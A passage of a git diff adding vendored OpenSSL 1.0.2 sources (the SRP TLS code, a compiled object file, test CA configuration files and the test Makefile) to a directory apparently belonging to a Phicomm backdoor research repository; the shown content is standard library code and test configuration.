+         ((s->srp_ctx.s = BN_dup(ctx->srp_ctx.s)) == NULL)) ||
+        ((ctx->srp_ctx.B != NULL) &&
+         ((s->srp_ctx.B = BN_dup(ctx->srp_ctx.B)) == NULL)) ||
+        ((ctx->srp_ctx.A != NULL) &&
+         ((s->srp_ctx.A = BN_dup(ctx->srp_ctx.A)) == NULL)) ||
+        ((ctx->srp_ctx.a != NULL) &&
+         ((s->srp_ctx.a = BN_dup(ctx->srp_ctx.a)) == NULL)) ||
+        ((ctx->srp_ctx.v != NULL) &&
+         ((s->srp_ctx.v = BN_dup(ctx->srp_ctx.v)) == NULL)) ||
+        ((ctx->srp_ctx.b != NULL) &&
+         ((s->srp_ctx.b = BN_dup(ctx->srp_ctx.b)) == NULL))) {
+        SSLerr(SSL_F_SSL_SRP_CTX_INIT, ERR_R_BN_LIB);
+        goto err;
+    }
+    if ((ctx->srp_ctx.login != NULL) &&
+        ((s->srp_ctx.login = BUF_strdup(ctx->srp_ctx.login)) == NULL)) {
+        SSLerr(SSL_F_SSL_SRP_CTX_INIT, ERR_R_INTERNAL_ERROR);
+        goto err;
+    }
+    s->srp_ctx.srp_Mask = ctx->srp_ctx.srp_Mask;
+
+    return (1);
+ err:
+    OPENSSL_free(s->srp_ctx.login);
+    BN_free(s->srp_ctx.N);
+    BN_free(s->srp_ctx.g);
+    BN_free(s->srp_ctx.s);
+    BN_free(s->srp_ctx.B);
+    BN_free(s->srp_ctx.A);
+    BN_free(s->srp_ctx.a);
+    BN_free(s->srp_ctx.b);
+    BN_free(s->srp_ctx.v);
+    return (0);
+}
+
+int SSL_CTX_SRP_CTX_init(struct ssl_ctx_st *ctx)
+{
+    if (ctx == NULL)
+        return 0;
+
+    ctx->srp_ctx.SRP_cb_arg = NULL;
+    /* set client Hello login callback */
+    ctx->srp_ctx.TLS_ext_srp_username_callback = NULL;
+    /* set SRP N/g param callback for verification */
+    ctx->srp_ctx.SRP_verify_param_callback = NULL;
+    /* set SRP client passwd callback */
+    ctx->srp_ctx.SRP_give_srp_client_pwd_callback = NULL;
+
+    ctx->srp_ctx.N = NULL;
+    ctx->srp_ctx.g = NULL;
+    ctx->srp_ctx.s = NULL;
+    ctx->srp_ctx.B = NULL;
+    ctx->srp_ctx.A = NULL;
+    ctx->srp_ctx.a = NULL;
+    ctx->srp_ctx.b = NULL;
+    ctx->srp_ctx.v = NULL;
+    ctx->srp_ctx.login = NULL;
+    ctx->srp_ctx.srp_Mask = 0;
+    ctx->srp_ctx.info = NULL;
+    ctx->srp_ctx.strength = SRP_MINIMAL_N;
+
+    return (1);
+}
+
+/* server side */
+int SSL_srp_server_param_with_username(SSL *s, int *ad)
+{
+    unsigned char b[SSL_MAX_MASTER_KEY_LENGTH];
+    int al;
+
+    *ad = SSL_AD_UNKNOWN_PSK_IDENTITY;
+    if ((s->srp_ctx.TLS_ext_srp_username_callback != NULL) &&
+        ((al =
+          s->srp_ctx.TLS_ext_srp_username_callback(s, ad,
+                                                   s->srp_ctx.SRP_cb_arg)) !=
+         SSL_ERROR_NONE))
+        return al;
+
+    *ad = SSL_AD_INTERNAL_ERROR;
+    if ((s->srp_ctx.N == NULL) ||
+        (s->srp_ctx.g == NULL) ||
+        (s->srp_ctx.s == NULL) || (s->srp_ctx.v == NULL))
+        return SSL3_AL_FATAL;
+
+    if (RAND_bytes(b, sizeof(b)) <= 0)
+        return SSL3_AL_FATAL;
+    s->srp_ctx.b = BN_bin2bn(b, sizeof(b), NULL);
+    OPENSSL_cleanse(b, sizeof(b));
+
+    /* Calculate:  B = (kv + g^b) % N  */
+
+    return ((s->srp_ctx.B =
+             SRP_Calc_B(s->srp_ctx.b, s->srp_ctx.N, s->srp_ctx.g,
+                        s->srp_ctx.v)) !=
+            NULL) ? SSL_ERROR_NONE : SSL3_AL_FATAL;
+}
+
+/*
+ * If the server just has the raw password, make up a verifier entry on the
+ * fly
+ */
+int SSL_set_srp_server_param_pw(SSL *s, const char *user, const char *pass,
+                                const char *grp)
+{
+    SRP_gN *GN = SRP_get_default_gN(grp);
+    if (GN == NULL)
+        return -1;
+    s->srp_ctx.N = BN_dup(GN->N);
+    s->srp_ctx.g = BN_dup(GN->g);
+    if (s->srp_ctx.v != NULL) {
+        BN_clear_free(s->srp_ctx.v);
+        s->srp_ctx.v = NULL;
+    }
+    if (s->srp_ctx.s != NULL) {
+        BN_clear_free(s->srp_ctx.s);
+        s->srp_ctx.s = NULL;
+    }
+    if (!SRP_create_verifier_BN
+        (user, pass, &s->srp_ctx.s, &s->srp_ctx.v, GN->N, GN->g))
+        return -1;
+
+    return 1;
+}
+
+int SSL_set_srp_server_param(SSL *s, const BIGNUM *N, const BIGNUM *g,
+                             BIGNUM *sa, BIGNUM *v, char *info)
+{
+    if (N != NULL) {
+        if (s->srp_ctx.N != NULL) {
+            if (!BN_copy(s->srp_ctx.N, N)) {
+                BN_free(s->srp_ctx.N);
+                s->srp_ctx.N = NULL;
+            }
+        } else
+            s->srp_ctx.N = BN_dup(N);
+    }
+    if (g != NULL) {
+        if (s->srp_ctx.g != NULL) {
+            if (!BN_copy(s->srp_ctx.g, g)) {
+                BN_free(s->srp_ctx.g);
+                s->srp_ctx.g = NULL;
+            }
+        } else
+            s->srp_ctx.g = BN_dup(g);
+    }
+    if (sa != NULL) {
+        if (s->srp_ctx.s != NULL) {
+            if (!BN_copy(s->srp_ctx.s, sa)) {
+                BN_free(s->srp_ctx.s);
+                s->srp_ctx.s = NULL;
+            }
+        } else
+            s->srp_ctx.s = BN_dup(sa);
+    }
+    if (v != NULL) {
+        if (s->srp_ctx.v != NULL) {
+            if (!BN_copy(s->srp_ctx.v, v)) {
+                BN_free(s->srp_ctx.v);
+                s->srp_ctx.v = NULL;
+            }
+        } else
+            s->srp_ctx.v = BN_dup(v);
+    }
+    s->srp_ctx.info = info;
+
+    if (!(s->srp_ctx.N) ||
+        !(s->srp_ctx.g) || !(s->srp_ctx.s) || !(s->srp_ctx.v))
+        return -1;
+
+    return 1;
+}
+
+int SRP_generate_server_master_secret(SSL *s, unsigned char *master_key)
+{
+    BIGNUM *K = NULL, *u = NULL;
+    int ret = -1, tmp_len;
+    unsigned char *tmp = NULL;
+
+    if (!SRP_Verify_A_mod_N(s->srp_ctx.A, s->srp_ctx.N))
+        goto err;
+    if (!(u = SRP_Calc_u(s->srp_ctx.A, s->srp_ctx.B, s->srp_ctx.N)))
+        goto err;
+    if (!
+        (K =
+         SRP_Calc_server_key(s->srp_ctx.A, s->srp_ctx.v, u, s->srp_ctx.b,
+                             s->srp_ctx.N)))
+        goto err;
+
+    tmp_len = BN_num_bytes(K);
+    if ((tmp = OPENSSL_malloc(tmp_len)) == NULL)
+        goto err;
+    BN_bn2bin(K, tmp);
+    ret =
+        s->method->ssl3_enc->generate_master_secret(s, master_key, tmp,
+                                                    tmp_len);
+ err:
+    if (tmp) {
+        OPENSSL_cleanse(tmp, tmp_len);
+        OPENSSL_free(tmp);
+    }
+    BN_clear_free(K);
+    BN_clear_free(u);
+    return ret;
+}
+
+/* client side */
+int SRP_generate_client_master_secret(SSL *s, unsigned char *master_key)
+{
+    BIGNUM *x = NULL, *u = NULL, *K = NULL;
+    int ret = -1, tmp_len;
+    char *passwd = NULL;
+    unsigned char *tmp = NULL;
+
+    /*
+     * Checks if b % n == 0
+     */
+    if (SRP_Verify_B_mod_N(s->srp_ctx.B, s->srp_ctx.N) == 0)
+        goto err;
+    if (!(u = SRP_Calc_u(s->srp_ctx.A, s->srp_ctx.B, s->srp_ctx.N)))
+        goto err;
+    if (s->srp_ctx.SRP_give_srp_client_pwd_callback == NULL)
+        goto err;
+    if (!
+        (passwd =
+         s->srp_ctx.SRP_give_srp_client_pwd_callback(s,
+                                                     s->srp_ctx.SRP_cb_arg)))
+        goto err;
+    if (!(x = SRP_Calc_x(s->srp_ctx.s, s->srp_ctx.login, passwd)))
+        goto err;
+    if (!
+        (K =
+         SRP_Calc_client_key(s->srp_ctx.N, s->srp_ctx.B, s->srp_ctx.g, x,
+                             s->srp_ctx.a, u)))
+        goto err;
+
+    tmp_len = BN_num_bytes(K);
+    if ((tmp = OPENSSL_malloc(tmp_len)) == NULL)
+        goto err;
+    BN_bn2bin(K, tmp);
+    ret =
+        s->method->ssl3_enc->generate_master_secret(s, master_key, tmp,
+                                                    tmp_len);
+ err:
+    if (tmp) {
+        OPENSSL_cleanse(tmp, tmp_len);
+        OPENSSL_free(tmp);
+    }
+    BN_clear_free(K);
+    BN_clear_free(x);
+    if (passwd) {
+        OPENSSL_cleanse(passwd, strlen(passwd));
+        OPENSSL_free(passwd);
+    }
+    BN_clear_free(u);
+    return ret;
+}
+
+int srp_verify_server_param(SSL *s, int *al)
+{
+    SRP_CTX *srp = &s->srp_ctx;
+    /*
+     * Sanity check parameters: we can quickly check B % N == 0 by checking B
+     * != 0 since B < N
+     */
+    if (BN_ucmp(srp->g, srp->N) >= 0 || BN_ucmp(srp->B, srp->N) >= 0
+        || BN_is_zero(srp->B)) {
+        *al = SSL3_AD_ILLEGAL_PARAMETER;
+        return 0;
+    }
+
+    if (BN_num_bits(srp->N) < srp->strength) {
+        *al = TLS1_AD_INSUFFICIENT_SECURITY;
+        return 0;
+    }
+
+    if (srp->SRP_verify_param_callback) {
+        if (srp->SRP_verify_param_callback(s, srp->SRP_cb_arg) <= 0) {
+            *al = TLS1_AD_INSUFFICIENT_SECURITY;
+            return 0;
+        }
+    } else if (!SRP_check_known_gN_param(srp->g, srp->N)) {
+        *al = TLS1_AD_INSUFFICIENT_SECURITY;
+        return 0;
+    }
+
+    return 1;
+}
+
+int SRP_Calc_A_param(SSL *s)
+{
+    unsigned char rnd[SSL_MAX_MASTER_KEY_LENGTH];
+
+    RAND_bytes(rnd, sizeof(rnd));
+    s->srp_ctx.a = BN_bin2bn(rnd, sizeof(rnd), s->srp_ctx.a);
+    OPENSSL_cleanse(rnd, sizeof(rnd));
+
+    if (!
+        (s->srp_ctx.A = SRP_Calc_A(s->srp_ctx.a, s->srp_ctx.N, s->srp_ctx.g)))
+        return -1;
+
+    return 1;
+}
+
+BIGNUM *SSL_get_srp_g(SSL *s)
+{
+    if (s->srp_ctx.g != NULL)
+        return s->srp_ctx.g;
+    return s->ctx->srp_ctx.g;
+}
+
+BIGNUM *SSL_get_srp_N(SSL *s)
+{
+    if (s->srp_ctx.N != NULL)
+        return s->srp_ctx.N;
+    return s->ctx->srp_ctx.N;
+}
+
+char *SSL_get_srp_username(SSL *s)
+{
+    if (s->srp_ctx.login != NULL)
+        return s->srp_ctx.login;
+    return s->ctx->srp_ctx.login;
+}
+
+char *SSL_get_srp_userinfo(SSL *s)
+{
+    if (s->srp_ctx.info != NULL)
+        return s->srp_ctx.info;
+    return s->ctx->srp_ctx.info;
+}
+
+# define tls1_ctx_ctrl ssl3_ctx_ctrl
+# define tls1_ctx_callback_ctrl ssl3_ctx_callback_ctrl
+
+int SSL_CTX_set_srp_username(SSL_CTX *ctx, char *name)
+{
+    return tls1_ctx_ctrl(ctx, SSL_CTRL_SET_TLS_EXT_SRP_USERNAME, 0, name);
+}
+
+int SSL_CTX_set_srp_password(SSL_CTX *ctx, char *password)
+{
+    return tls1_ctx_ctrl(ctx, SSL_CTRL_SET_TLS_EXT_SRP_PASSWORD, 0, password);
+}
+
+int SSL_CTX_set_srp_strength(SSL_CTX *ctx, int strength)
+{
+    return tls1_ctx_ctrl(ctx, SSL_CTRL_SET_TLS_EXT_SRP_STRENGTH, strength,
+                         NULL);
+}
+
+int SSL_CTX_set_srp_verify_param_callback(SSL_CTX *ctx,
+                                          int (*cb) (SSL *, void *))
+{
+    return tls1_ctx_callback_ctrl(ctx, SSL_CTRL_SET_SRP_VERIFY_PARAM_CB,
+                                  (void (*)(void))cb);
+}
+
+int SSL_CTX_set_srp_cb_arg(SSL_CTX *ctx, void *arg)
+{
+    return tls1_ctx_ctrl(ctx, SSL_CTRL_SET_SRP_ARG, 0, arg);
+}
+
+int SSL_CTX_set_srp_username_callback(SSL_CTX *ctx,
+                                      int (*cb) (SSL *, int *, void *))
+{
+    return tls1_ctx_callback_ctrl(ctx, SSL_CTRL_SET_TLS_EXT_SRP_USERNAME_CB,
+                                  (void (*)(void))cb);
+}
+
+int SSL_CTX_set_srp_client_pwd_callback(SSL_CTX *ctx,
+                                        char *(*cb) (SSL *, void *))
+{
+    return tls1_ctx_callback_ctrl(ctx, SSL_CTRL_SET_SRP_GIVE_CLIENT_PWD_CB,
+                                  (void (*)(void))cb);
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/tls_srp.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/tls_srp.o
new file mode 100644
index 0000000000000000000000000000000000000000..65fda1e7d1d4c03830860e3a71438c8cc2f4519e
GIT binary patch
literal 1080
zcmbVLO-sW-5S?`E_eF1lmv~aqE~y`g9wbm|FCtzFf(J=rP^kGJ*?_(1U-0L6>|gR1
z=uEPU%WmqS1CzJ&_PyE3ru`V+Tz4D?R5)-2f0beZzBJOWX&=^M4PZ1FT)O+?uu4Vc
zUhos{_4?;kUH0FPJ?@<zG<4Iei?E5gggLq$LkD0+9K-xC==d&t|FmgX>%`O(ySD_J
za~i9svJDKDZ4w!V6Imf%%g3_Fc?7`AX(ECUQ4|fnsFjG{1n{Ro1i-_x1RiBc5~s+e
znTR>wOs^C{G?DdlTJgNd^0*LF>%@hK9dyy1ns4UM>85@DTCs~y;>_>n*Sq$^^zWf$
z6?0Ml5qhbohpC4zi$k5nwK`wnna1hTiC$=H<x|uU7b}?NFD#b=SE2%XS3Rho>81To
qDVj+npGu;(C6E6+>+WdlP7b;ubqdV+w{XL}d(u8g;k`0SH2uG#HaTSg

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/CAss.cnf b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/CAss.cnf
new file mode 100644
index 0000000..109bc8c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/CAss.cnf
@@ -0,0 +1,76 @@
+#
+# SSLeay example configuration file.
+# This is mostly being used for generation of certificate requests.
+#
+
+RANDFILE		= ./.rnd
+
+####################################################################
+[ req ]
+default_bits		= 2048
+default_keyfile 	= keySS.pem
+distinguished_name	= req_distinguished_name
+encrypt_rsa_key		= no
+default_md		= sha1
+
+[ req_distinguished_name ]
+countryName			= Country Name (2 letter code)
+countryName_default		= AU
+countryName_value		= AU
+
+organizationName		= Organization Name (eg, company)
+organizationName_value		= Dodgy Brothers
+
+commonName			= Common Name (eg, YOUR name)
+commonName_value		= Dodgy CA
+
+####################################################################
+[ ca ]
+default_ca	= CA_default		# The default ca section
+
+####################################################################
+[ CA_default ]
+
+dir		= ./demoCA		# Where everything is kept
+certs		= $dir/certs		# Where the issued certs are kept
+crl_dir		= $dir/crl		# Where the issued crl are kept
+database	= $dir/index.txt	# database index file.
+#unique_subject	= no			# Set to 'no' to allow creation of
+					# several ctificates with same subject.
+new_certs_dir	= $dir/newcerts		# default place for new certs.
+
+certificate	= $dir/cacert.pem 	# The CA certificate
+serial		= $dir/serial 		# The current serial number
+crl		= $dir/crl.pem 		# The current CRL
+private_key	= $dir/private/cakey.pem# The private key
+RANDFILE	= $dir/private/.rand	# private random number file
+
+x509_extensions	= v3_ca			# The extentions to add to the cert
+
+name_opt 	= ca_default		# Subject Name options
+cert_opt 	= ca_default		# Certificate field options
+
+default_days	= 365			# how long to certify for
+default_crl_days= 30			# how long before next CRL
+default_md	= md5			# which md to use.
+preserve	= no			# keep passed DN ordering
+
+policy		= policy_anything
+
+[ policy_anything ]
+countryName		= optional
+stateOrProvinceName	= optional
+localityName		= optional
+organizationName	= optional
+organizationalUnitName	= optional
+commonName		= supplied
+emailAddress		= optional
+
+
+
+[ v3_ca ]
+subjectKeyIdentifier=hash
+authorityKeyIdentifier=keyid:always,issuer:always
+basicConstraints = CA:true,pathlen:1
+keyUsage = cRLSign, keyCertSign
+issuerAltName=issuer:copy
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/CAssdh.cnf b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/CAssdh.cnf
new file mode 100644
index 0000000..4e0a908
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/CAssdh.cnf
@@ -0,0 +1,24 @@
+#
+# SSLeay example configuration file.
+# This is mostly being used for generation of certificate requests.
+#
+# hacked by iang to do DH certs - CA
+
+RANDFILE              = ./.rnd
+
+####################################################################
+[ req ]
+distinguished_name    = req_distinguished_name
+encrypt_rsa_key               = no
+
+[ req_distinguished_name ]
+countryName                   = Country Name (2 letter code)
+countryName_default           = CU
+countryName_value             = CU
+
+organizationName              = Organization Name (eg, company)
+organizationName_value                = La Junta de la Revolucion
+
+commonName                    = Common Name (eg, YOUR name)
+commonName_value              = Junta
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/CAssdsa.cnf b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/CAssdsa.cnf
new file mode 100644
index 0000000..a6b4d18
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/CAssdsa.cnf
@@ -0,0 +1,23 @@
+#
+# SSLeay example configuration file.
+# This is mostly being used for generation of certificate requests.
+#
+# hacked by iang to do DSA certs - CA
+
+RANDFILE              = ./.rnd
+
+####################################################################
+[ req ]
+distinguished_name    = req_distinguished_name
+encrypt_rsa_key               = no
+
+[ req_distinguished_name ]
+countryName                   = Country Name (2 letter code)
+countryName_default           = ES
+countryName_value             = ES
+
+organizationName              = Organization Name (eg, company)
+organizationName_value                = Hermanos Locos
+
+commonName                    = Common Name (eg, YOUR name)
+commonName_value              = Hermanos Locos CA
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/CAssrsa.cnf b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/CAssrsa.cnf
new file mode 100644
index 0000000..eb24a6d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/CAssrsa.cnf
@@ -0,0 +1,24 @@
+#
+# SSLeay example configuration file.
+# This is mostly being used for generation of certificate requests.
+#
+# create RSA certs - CA
+
+RANDFILE              = ./.rnd
+
+####################################################################
+[ req ]
+distinguished_name    = req_distinguished_name
+encrypt_key           = no
+
+[ req_distinguished_name ]
+countryName                   = Country Name (2 letter code)
+countryName_default           = ES
+countryName_value             = ES
+
+organizationName              = Organization Name (eg, company)
+organizationName_value                = Hermanos Locos
+
+commonName                    = Common Name (eg, YOUR name)
+commonName_value              = Hermanos Locos CA
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/CAtsa.cnf b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/CAtsa.cnf
new file mode 100644
index 0000000..f5a275b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/CAtsa.cnf
@@ -0,0 +1,163 @@
+
+#
+# This config is used by the Time Stamp Authority tests.
+#
+
+RANDFILE		= ./.rnd
+
+# Extra OBJECT IDENTIFIER info:
+oid_section		= new_oids
+
+TSDNSECT		= ts_cert_dn
+INDEX			= 1
+
+[ new_oids ]
+
+# Policies used by the TSA tests.
+tsa_policy1 = 1.2.3.4.1
+tsa_policy2 = 1.2.3.4.5.6
+tsa_policy3 = 1.2.3.4.5.7
+
+#----------------------------------------------------------------------
+[ ca ]
+default_ca	= CA_default		# The default ca section
+
+[ CA_default ]
+
+dir		= ./demoCA
+certs		= $dir/certs		# Where the issued certs are kept
+database	= $dir/index.txt	# database index file.
+new_certs_dir	= $dir/newcerts		# default place for new certs.
+
+certificate	= $dir/cacert.pem 	# The CA certificate
+serial		= $dir/serial 		# The current serial number
+private_key	= $dir/private/cakey.pem# The private key
+RANDFILE	= $dir/private/.rand	# private random number file
+
+default_days	= 365			# how long to certify for
+default_md	= sha1			# which md to use.
+preserve	= no			# keep passed DN ordering
+
+policy		= policy_match
+
+# For the CA policy
+[ policy_match ]
+countryName		= supplied
+stateOrProvinceName	= supplied
+organizationName	= supplied
+organizationalUnitName	= optional
+commonName		= supplied
+emailAddress		= optional
+
+#----------------------------------------------------------------------
+[ req ]
+default_bits		= 1024
+default_md		= sha1
+distinguished_name	= $ENV::TSDNSECT
+encrypt_rsa_key		= no
+prompt 			= no
+# attributes		= req_attributes
+x509_extensions	= v3_ca	# The extentions to add to the self signed cert
+
+string_mask = nombstr
+
+[ ts_ca_dn ]
+countryName			= HU
+stateOrProvinceName		= Budapest
+localityName			= Budapest
+organizationName		= Gov-CA Ltd.
+commonName			= ca1
+
+[ ts_cert_dn ]
+countryName			= HU
+stateOrProvinceName		= Budapest
+localityName			= Buda
+organizationName		= Hun-TSA Ltd.
+commonName			= tsa$ENV::INDEX
+
+[ tsa_cert ]
+
+# TSA server cert is not a CA cert.
+basicConstraints=CA:FALSE
+
+# The following key usage flags are needed for TSA server certificates.
+keyUsage = nonRepudiation, digitalSignature
+extendedKeyUsage = critical,timeStamping
+
+# PKIX recommendations harmless if included in all certificates.
+subjectKeyIdentifier=hash
+authorityKeyIdentifier=keyid,issuer:always
+
+[ non_tsa_cert ]
+
+# This is not a CA cert and not a TSA cert, either (timeStamping usage missing)
+basicConstraints=CA:FALSE
+
+# The following key usage flags are needed for TSA server certificates.
+keyUsage = nonRepudiation, digitalSignature
+# timeStamping is not supported by this certificate
+# extendedKeyUsage = critical,timeStamping
+
+# PKIX recommendations harmless if included in all certificates.
+subjectKeyIdentifier=hash
+authorityKeyIdentifier=keyid,issuer:always
+
+[ v3_req ]
+
+# Extensions to add to a certificate request
+basicConstraints = CA:FALSE
+keyUsage = nonRepudiation, digitalSignature
+
+[ v3_ca ]
+
+# Extensions for a typical CA
+
+subjectKeyIdentifier=hash
+authorityKeyIdentifier=keyid:always,issuer:always
+basicConstraints = critical,CA:true
+keyUsage = cRLSign, keyCertSign
+
+#----------------------------------------------------------------------
+[ tsa ]
+
+default_tsa = tsa_config1	# the default TSA section
+
+[ tsa_config1 ]
+
+# These are used by the TSA reply generation only.
+dir		= .			# TSA root directory
+serial		= $dir/tsa_serial	# The current serial number (mandatory)
+signer_cert	= $dir/tsa_cert1.pem 	# The TSA signing certificate
+					# (optional)
+certs		= $dir/tsaca.pem	# Certificate chain to include in reply
+					# (optional)
+signer_key	= $dir/tsa_key1.pem	# The TSA private key (optional)
+
+default_policy	= tsa_policy1		# Policy if request did not specify it
+					# (optional)
+other_policies	= tsa_policy2, tsa_policy3	# acceptable policies (optional)
+digests		= md5, sha1		# Acceptable message digests (mandatory)
+accuracy	= secs:1, millisecs:500, microsecs:100	# (optional)
+ordering		= yes	# Is ordering defined for timestamps?
+				# (optional, default: no)
+tsa_name		= yes	# Must the TSA name be included in the reply?
+				# (optional, default: no)
+ess_cert_id_chain	= yes	# Must the ESS cert id chain be included?
+				# (optional, default: no)
+
+[ tsa_config2 ]
+
+# This configuration uses a certificate which doesn't have timeStamping usage.
+# These are used by the TSA reply generation only.
+dir		= .			# TSA root directory
+serial		= $dir/tsa_serial	# The current serial number (mandatory)
+signer_cert	= $dir/tsa_cert2.pem 	# The TSA signing certificate
+					# (optional)
+certs		= $dir/demoCA/cacert.pem# Certificate chain to include in reply
+					# (optional)
+signer_key	= $dir/tsa_key2.pem	# The TSA private key (optional)
+
+default_policy	= tsa_policy1		# Policy if request did not specify it
+					# (optional)
+other_policies	= tsa_policy2, tsa_policy3	# acceptable policies (optional)
+digests		= md5, sha1		# Acceptable message digests (mandatory)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/Makefile
new file mode 100644
index 0000000..7f67bae
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/Makefile
@@ -0,0 +1,764 @@
+#
+# test/Makefile
+#
+
+DIR=		test
+TOP=		..
+CC=		cc
+INCLUDES=	-I$(TOP) -I../include $(KRB5_INCLUDES)
+CFLAG=		-g
+MAKEDEPEND=	$(TOP)/util/domd $(TOP) -MD $(MAKEDEPPROG)
+PERL=		perl
+# KRB5 stuff
+KRB5_INCLUDES=
+LIBKRB5=
+TEST=		igetest.c
+
+PEX_LIBS=
+EX_LIBS= #-lnsl -lsocket
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile maketests.com \
+	tests.com testenc.com tx509.com trsa.com tcrl.com tsid.com treq.com \
+	tpkcs7.com tpkcs7d.com tverify.com testgen.com testss.com testssl.com \
+	testca.com VMSca-response.1 VMSca-response.2
+
+DLIBCRYPTO= ../libcrypto.a
+DLIBSSL= ../libssl.a
+LIBCRYPTO= -L.. -lcrypto
+LIBSSL= -L.. -lssl
+
+BNTEST=		bntest
+ECTEST=		ectest
+ECDSATEST=	ecdsatest
+ECDHTEST=	ecdhtest
+EXPTEST=	exptest
+IDEATEST=	ideatest
+SHATEST=	shatest
+SHA1TEST=	sha1test
+SHA256TEST=	sha256t
+SHA512TEST=	sha512t
+MDC2TEST=	mdc2test
+RMDTEST=	rmdtest
+MD2TEST=	md2test
+MD4TEST=	md4test
+MD5TEST=	md5test
+HMACTEST=	hmactest
+WPTEST=		wp_test
+RC2TEST=	rc2test
+RC4TEST=	rc4test
+RC5TEST=	rc5test
+BFTEST=		bftest
+CASTTEST=	casttest
+DESTEST=	destest
+RANDTEST=	randtest
+DHTEST=		dhtest
+DSATEST=	dsatest
+METHTEST=	methtest
+SSLTEST=	ssltest
+RSATEST=	rsa_test
+ENGINETEST=	enginetest
+EVPTEST=	evp_test
+IGETEST=	igetest
+JPAKETEST=	jpaketest
+SRPTEST=	srptest
+V3NAMETEST=	v3nametest
+ASN1TEST=	asn1test
+HEARTBEATTEST=  heartbeat_test
+CONSTTIMETEST=  constant_time_test
+
+TESTS=		alltests
+
+EXE=	$(BNTEST)$(EXE_EXT) $(ECTEST)$(EXE_EXT)  $(ECDSATEST)$(EXE_EXT) $(ECDHTEST)$(EXE_EXT) $(IDEATEST)$(EXE_EXT) \
+	$(MD2TEST)$(EXE_EXT)  $(MD4TEST)$(EXE_EXT) $(MD5TEST)$(EXE_EXT) $(HMACTEST)$(EXE_EXT) $(WPTEST)$(EXE_EXT) \
+	$(RC2TEST)$(EXE_EXT) $(RC4TEST)$(EXE_EXT) $(RC5TEST)$(EXE_EXT) \
+	$(DESTEST)$(EXE_EXT) $(SHATEST)$(EXE_EXT) $(SHA1TEST)$(EXE_EXT) $(SHA256TEST)$(EXE_EXT) $(SHA512TEST)$(EXE_EXT) \
+	$(MDC2TEST)$(EXE_EXT) $(RMDTEST)$(EXE_EXT) \
+	$(RANDTEST)$(EXE_EXT) $(DHTEST)$(EXE_EXT) $(ENGINETEST)$(EXE_EXT) \
+	$(BFTEST)$(EXE_EXT) $(CASTTEST)$(EXE_EXT) $(SSLTEST)$(EXE_EXT) $(EXPTEST)$(EXE_EXT) $(DSATEST)$(EXE_EXT) $(RSATEST)$(EXE_EXT) \
+	$(EVPTEST)$(EXE_EXT) $(IGETEST)$(EXE_EXT) $(JPAKETEST)$(EXE_EXT) $(SRPTEST)$(EXE_EXT) \
+	$(ASN1TEST)$(EXE_EXT) $(V3NAMETEST)$(EXE_EXT) $(HEARTBEATTEST)$(EXE_EXT) \
+	$(CONSTTIMETEST)$(EXE_EXT)
+
+# $(METHTEST)$(EXE_EXT)
+
+OBJ=	$(BNTEST).o $(ECTEST).o  $(ECDSATEST).o $(ECDHTEST).o $(IDEATEST).o \
+	$(MD2TEST).o $(MD4TEST).o $(MD5TEST).o \
+	$(HMACTEST).o $(WPTEST).o \
+	$(RC2TEST).o $(RC4TEST).o $(RC5TEST).o \
+	$(DESTEST).o $(SHATEST).o $(SHA1TEST).o $(SHA256TEST).o $(SHA512TEST).o \
+	$(MDC2TEST).o $(RMDTEST).o \
+	$(RANDTEST).o $(DHTEST).o $(ENGINETEST).o $(CASTTEST).o \
+	$(BFTEST).o  $(SSLTEST).o  $(DSATEST).o  $(EXPTEST).o $(RSATEST).o \
+	$(EVPTEST).o $(IGETEST).o $(JPAKETEST).o $(ASN1TEST).o $(V3NAMETEST).o \
+	$(HEARTBEATTEST).o $(CONSTTIMETEST).o
+
+SRC=	$(BNTEST).c $(ECTEST).c  $(ECDSATEST).c $(ECDHTEST).c $(IDEATEST).c \
+	$(MD2TEST).c  $(MD4TEST).c $(MD5TEST).c \
+	$(HMACTEST).c $(WPTEST).c \
+	$(RC2TEST).c $(RC4TEST).c $(RC5TEST).c \
+	$(DESTEST).c $(SHATEST).c $(SHA1TEST).c $(MDC2TEST).c $(RMDTEST).c \
+	$(RANDTEST).c $(DHTEST).c $(ENGINETEST).c $(CASTTEST).c \
+	$(BFTEST).c  $(SSLTEST).c $(DSATEST).c   $(EXPTEST).c $(RSATEST).c \
+	$(EVPTEST).c $(IGETEST).c $(JPAKETEST).c $(SRPTEST).c $(ASN1TEST).c \
+	$(V3NAMETEST).c $(HEARTBEATTEST).c $(CONSTTIMETEST).c
+
+EXHEADER= 
+HEADER=	testutil.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ..; $(MAKE) DIRS=$(DIR) TESTS=$(TESTS) all)
+
+all:	exe
+
+exe:	$(EXE) dummytest$(EXE_EXT)
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+
+generate: $(SRC)
